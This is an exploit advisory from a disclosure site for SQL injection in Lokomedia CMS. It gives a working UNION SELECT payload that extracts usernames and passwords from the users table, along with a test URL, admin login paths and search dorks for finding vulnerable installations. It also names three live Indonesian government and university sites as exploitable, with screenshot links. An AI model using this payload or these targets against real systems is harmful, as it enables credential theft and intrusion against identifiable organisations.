Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

2016.08.31

K33P-S1L3NT (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

###########################

# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

###########################

=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack 
[+] Contact :- aurorakoizora@gmail.com

=========================================================
[+] Severity Level :- Medium

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- id,
      statis-1-profil.html (string ) 
      statis-3-strukturorganisasi.html (string )
      statis-1-visimisi.html (string)
      statis-1-tujuan.html  (string)

[+] Dork : - 
      statis-1-profil.html (work100% ) 
      statis-3-strukturorganisasi.html (work100% )
      statis-1-visimisi.html (work100%)
      statis-1-tujuan.html  (work100%)

[+] Local Admin 
     /redaktur
     /adminweb
     /administrator
     /redaktur/index.php
     /adminlogin
     /admin
     /login.php

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home/user/public_html/XXX.php

[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
              - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
              - http://127.0.0.1/statis-1( exploit-code )visimisi.html
              - http://127.0.0.1/statis-1( exploit-code )tujuan.html

########################################################

[+] Exploit 

/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

##########################################################

[+] Testing 
 
http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html

[+] NOTE 

 username & password open on title-bar  or  CTRL+U for view username & password this website exploit

###########################################################

[+] LIVE 

http://portal.ukit.ac.id ( Title-bar  http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )

References:

https://www.facebook.com/loading.gov/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.